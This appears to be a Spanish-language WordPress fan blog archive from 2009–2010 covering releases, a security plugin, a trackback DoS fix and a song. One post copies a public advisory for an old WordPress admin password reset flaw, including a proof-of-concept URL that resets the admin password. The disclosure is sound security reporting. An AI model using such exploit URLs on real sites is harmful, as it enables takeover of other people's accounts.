/dev/zero » wordpress

7 años de WordPress

admin — Fri, 28 May 2010 03:20:43 +0000

Hoy WordPress, este genial CMS, cumple 7 años. Para festejar WP lanzó la primera Release Candidate para la versión 3. Siempre manteniendose libre y bajo licencia GPL.

WordPress 2.9 “Carmen”

admin — Sat, 19 Dec 2009 15:20:27 +0000

Ya esta disponible la version 2.9 “Carmen” de WordPress. Pueden bajarlo de acá (Ingles)

Alea iacta est

Actualizar WordPress a 2.8.6

admin — Fri, 13 Nov 2009 06:11:04 +0000

La gente de wordpress.org recomienda actualizar a la version 2.8.6, recien salida del horno, que corrige 2 problemas de seguridad.

WordPress Exploit scanner

admin — Sun, 25 Oct 2009 14:50:33 +0000

Pueden probar WordPress Exploit Scanner. Este plugin busca codigo malicioso en archivos, posts/comentarios en tu base de datos.

Prueben y me cuentan si reciben un error 500…

WordPress 2.8.5: Hardening Release

admin — Thu, 22 Oct 2009 04:27:32 +0000

Se recomienda actualizar WordPress a 2.8.5, teniendo en cuenta el último fallo grave encontrado, que he comentado en el anterior post.

Peter Westwood, en el blog de WordPress nos comenta que problemas soluciona esta actualización.

Saludos cordiales.

Vulnerabilidad WordPress 2.8.x

admin — Mon, 19 Oct 2009 03:30:27 +0000

WordPress es vulnerable a denegación de servicio (DoS). Este grave error en el archivo wp-trackbacks.php lo descubrió Jose Norte y lo publicó en su blog Desvaríos Informáticos.

Las contramedidas son las sgtes.:

*Editar archivo wp-trackback.php buscar:

$charset = $_POST['charset'];

Reemplazar la búsqueda por:

$charset = str_replace(“,”,”",$_POST['charset']);

if(is_array($charset)) { exit; }

if(is_array($charset)) { exit; }

Vulnerabilidad WordPress 2.8.x

admin — Tue, 11 Aug 2009 23:33:29 +0000

Va un copy&paste de la vulnerabilidad, descubierta por Laurent Gaffié :

============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability. WordPress is both free and
priceless at the same time. More simply, WordPress is what you use when
you want to work with your blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way WordPress handle a password reset looks like this:
You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

"
Someone has asked to reset the password for the following site and username.

http://DOMAIN_NAME.TLD/wordpress

Username: admin
To reset your password visit the following address, otherwise just
ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

"

You click on the link, and then WordPress reset your admin password, and
sends you over another email with your new credentials.

Let's see how it works:

wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
...[snip]....

line 370:

break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

break;
...[snip ]...

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.

IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficiant to reproduce this Proof of concept:

http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=

The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch aviable for the moment.

VIII. REFERENCES
-------------------------

http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

# milw0rm.com [2009-08-11]

WordPress Trac

Update: actualizar WordPress a versión 2.8.4

Comments

admin — Sun, 02 Aug 2009 15:58:21 +0000

Los invito a comentar, no sean tímidos, de paso fíjense el poder de IntenseDebate, otra creación genial de Matt Mullenweg

La canción de WordPress

admin — Thu, 30 Jul 2009 00:54:18 +0000

Al fin alguien se dignó a hacer una canción a WordPress, mi CMS preferido

La letra:

Bienvenidos a mi encuentro, mi historia, con el CMS
Se trata de una impresionante pieza de software, se llama WordPress
Administra mi blog, hace que parezca muy chulo
Lo He instalado en 5 minutos, menos resbaladizo que el huelo
Todo lo que tenía que hacer, se hace con clic en Siguiente
En unos segundos me estaba funcionando, no se puede estar enfadado.

Se llama WordPress
Es mi CMS
Es lo mejor desde el porno en la web
El código es abierto, la fuente es libre
Está disponible para las personas, como usted y como yo.

Una vez que recogí mi título y escribió una descripción,
He hecho clic en la gestión, que necesitaba hacerlo para arreglarlo
He eliminado Hola mundo, se deshizo de la primera observación, también
He hecho clic en Ver sitio y todo lo que vi fue llanura azul
Me trasladé a la presentación, había algunos temas bonitos
Pero mi estilo no encaja, ninguno! gritó Devin Resmas.

Coro.

Después de ajustar el código y jugar con CSS
He instalado algunos plugins, yo estaba realmente impresionado
Ellos organizaron mis archivos, que me ayudó a etiquetar, también
Luego he instalado un bloqueador de spam para que entrara ni uno solo a través del blog
He añadido un vídeo y libro de calificaciones y puntuaciones
Ahora cuando la gente me visite sabrán que era un infierno de Manivela.

Coro.

Ahora usted puede estar pensando, toca muy bien el piano
Ojalá fuera cierto, yo deseo que yo podría
Me escribió la letra de esta canción nerdy,
Y la música es del GarageBand: balada de piano número 2

Coro x2